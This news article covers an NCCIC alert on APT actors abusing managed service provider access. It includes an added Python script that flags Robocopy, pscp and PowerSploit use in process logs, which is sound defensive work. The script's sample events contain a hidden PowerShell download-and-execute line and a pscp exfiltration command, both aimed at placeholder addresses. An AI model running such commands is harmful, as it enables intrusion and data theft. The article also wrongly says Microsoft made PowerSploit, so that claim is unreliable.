Advanced persistent threats (APTs) are targeting managed service providers’ networks, endangering healthcare data security and data security in other US critical infrastructure sectors, warned the National Cybersecurity and Communications Integration Center (NCCIC) in an Oct. 3 alert.
A successful APT attack can result in loss of PHI and other sensitive information, disruption of operations, costs to restore systems and files, and harm to the organization’s reputation, the alert said.
MSPs provide remote management of IT and end-user systems for customers. As a result, they have direct access to their customers’ networks and may store customer data in their own infrastructure.
A compromise in one part of an MSP’s network can spread, affecting other customers.
“Using an MSP significantly increases an organization’s virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cybercriminals and nation-state actors,” the alert noted.
“By using compromised legitimate MSP credentials (e.g., administration, domain, user), APT actors can move bidirectionally between an MSP and its customers’ shared networks. Bidirectional movement between networks allows APT actors to easily obfuscate detection measures and maintain a presence on victims’ networks,” it added.
To hide their presence, APT attackers exploit legitimate credentials, trusted off-the-shelf applications, and pre-installed system tools already on MSP customer networks. Pre-installed tools include command line scripts, which are used to discover accounts and remote systems.
APT attackers can use PowerSploit, a penetration testing tool made by Microsoft, to obscure their malicious activities.
“When APT actors use system tools and common cloud services, it can also be difficult for network defenders to detect data exfiltration,” NCCIC noted.
APT attackers have also used the Microsoft command-line tool Robocopy to transfer data from MSP client networks back through MSP network environments. They have also been known to use legitimate PuTTY Secure Copy Client functions to transfer stolen data securely and directly to third-party systems.
NCCIC advised organizations to configure system logs to detect incidents and identify the type and scope of malicious activity. This will enable rapid containment of the APT attack and appropriate response.
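The preceding paragraphs describe exfiltration through tools that are already on the customer's systems (Robocopy, PuTTY's pscp, PowerSploit-style PowerShell) and note that logging is what makes that activity visible. The following is an added example, not code from the NCCIC alert or this article, of how a defender might triage process-creation logs for exactly that pattern. It assumes a simplified record shape (roughly the fields Windows Event ID 4688 or Sysmon Event ID 1 provide), a hand-maintained list of the accounts an organization created for its MSP, a list of its own file servers, and a business-hours window; the sample events, account names, hostnames and addresses are all constructed for the example.

```python
import ipaddress
import re
from datetime import datetime

# --- Constructed reference data (assumptions for this example) ----------------
# Accounts the customer created for its MSP; in production this comes from the
# identity system or a CMDB, not a hard-coded set.
MSP_ACCOUNTS = {"MSPCORP\\svc-rmm-admin", "MSPCORP\\svc-rmm-patch"}
# File servers the customer considers its own, plus RFC 1918 address space.
INTERNAL_HOSTS = {"FS01", "NAS01"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BUSINESS_HOURS = range(7, 19)  # 07:00-18:59 UTC is treated as the normal working window

# Tools the alert names as used for staging and exfiltration, matched against
# the command line of each process-creation record.
TOOL_RULES = [
    ("robocopy", re.compile(r"\brobocopy(\.exe)?\b", re.I)),
    ("putty_scp", re.compile(r"\b(pscp|psftp)(\.exe)?\b", re.I)),
    ("powersploit", re.compile(
        r"Invoke-Mimikatz|Invoke-ReflectivePEInjection|Get-GPPPassword|DownloadString\(", re.I)),
]
UNC_HOST = re.compile(r"\\\\([A-Za-z0-9._-]+)")          # host part of \\host\share
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample events: three off-hours MSP-account actions on one clinic
# workstation, one legitimate nightly backup, and one unrelated process.
SAMPLE_EVENTS = [
    {"ts": "2018-10-03T02:14:09Z", "host": "WS-CLINIC-07", "user": "MSPCORP\\svc-rmm-admin",
     "cmdline": r"robocopy.exe \\FS01\PatientRecords \\MSP-RELAY\staging /E /Z /R:1"},
    {"ts": "2018-10-03T02:31:44Z", "host": "WS-CLINIC-07", "user": "MSPCORP\\svc-rmm-admin",
     "cmdline": r"pscp.exe -pw ******** C:\staging\export.zip ops@203.0.113.25:/srv/in/"},
    {"ts": "2018-10-03T02:05:12Z", "host": "WS-CLINIC-07", "user": "MSPCORP\\svc-rmm-admin",
     "cmdline": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                '.DownloadString(\'http://203.0.113.9/stage.ps1\')"'},
    {"ts": "2018-10-03T14:02:00Z", "host": "SRV-BACKUP-01", "user": "CLINIC\\backup-svc",
     "cmdline": r"robocopy.exe D:\Backups \\NAS01\nightly /MIR /LOG:D:\logs\nightly.log"},
    {"ts": "2018-10-03T09:45:30Z", "host": "WS-CLINIC-12", "user": "CLINIC\\jdoe",
     "cmdline": r"notepad.exe C:\Users\jdoe\notes.txt"},
]


def external_destinations(cmdline):
    """UNC hosts and IPv4 addresses in the command line that are not on the internal lists."""
    found = [h for h in UNC_HOST.findall(cmdline) if h.upper() not in INTERNAL_HOSTS]
    for ip in IPV4.findall(cmdline):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if not any(addr in net for net in INTERNAL_NETS):
            found.append(ip)
    return found


def score_event(event):
    """Return a finding for an event that invokes one of the named tools, else None.

    Score: tool invoked (+1), run under an MSP account (+2), outside business
    hours (+1), destination not on the internal list (+2). 4+ is high, 2-3 medium.
    """
    for rule, pattern in TOOL_RULES:
        if pattern.search(event["cmdline"]):
            break
    else:
        return None
    reasons, score = [f"{rule} invoked"], 1
    if event["user"] in MSP_ACCOUNTS:
        reasons.append("run under an MSP account")
        score += 2
    hour = datetime.fromisoformat(event["ts"].replace("Z", "+00:00")).hour
    if hour not in BUSINESS_HOURS:
        reasons.append("outside business hours")
        score += 1
    ext = external_destinations(event["cmdline"])
    if ext:
        reasons.append("destination not on internal list: " + ", ".join(ext))
        score += 2
    severity = "high" if score >= 4 else "medium" if score >= 2 else "low"
    return {"ts": event["ts"], "host": event["host"], "user": event["user"], "rule": rule,
            "severity": severity, "external_destinations": ext, "reasons": reasons}


def detect(events):
    """Run score_event over a sequence of records and keep only the findings."""
    return [f for f in (score_event(e) for e in events) if f]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["ts"], f["host"], f["user"], f["rule"],
              "|", "; ".join(f["reasons"]))
```

On the constructed sample this flags the three MSP-account events as high (named tool, MSP account, off-hours, and a destination that is neither a known internal server nor in private address space) and the nightly backup as low, which is the point of the scoring: the same Robocopy binary is routine in one context and an exfiltration indicator in another, and only the account, time and destination from the log record separate them.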
The most common attack methods used by APT attackers include spearphishing, malicious web content, and credential theft.
Organizations should prepare for APTs by:
- Establishing and periodically updating an incident response plan
- Establishing written guidelines that prioritize incidents based on mission impact, so that an appropriate response can be initiated
- Developing procedures and out-of-band lines of communication to handle incident reporting for internal and external relationships
- Exercising incident response measures for various intrusion scenarios regularly, as part of a training regime
- Committing to an effort that secures the endpoint and network infrastructure
MSP clients, such as healthcare organizations, should understand the supply chain risk associated with their MSP. Organizations should manage risk equally across their security, legal, and procurement groups.
MSP clients should also refer to NIST cloud security guidance to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection.
NCCIC said that restricting access to networks and systems is critical in containing an APT attacker’s movement around the network.
Compromised account credentials continue to be the number one way threat actors can penetrate a network environment. The accounts organizations create for MSPs increase the risk of credential compromise, as MSP accounts typically require elevated access.
NCCIC said it is important organizations adhere to best practices for password and permission management, as this can severely limit a threat actor’s ability to access and move laterally across a network.
Building a sound architecture supported by strong technical controls is only the first part of protecting a network environment, explained NCCIC. Organizations should continuously monitor their systems, update configurations to reflect changes in their network environment, and maintain relationships with MSPs.
NCCIC advised organizations to use a defense-in-depth strategy to increase the probability of identifying an intrusion, stopping malware, and disrupting APT activity.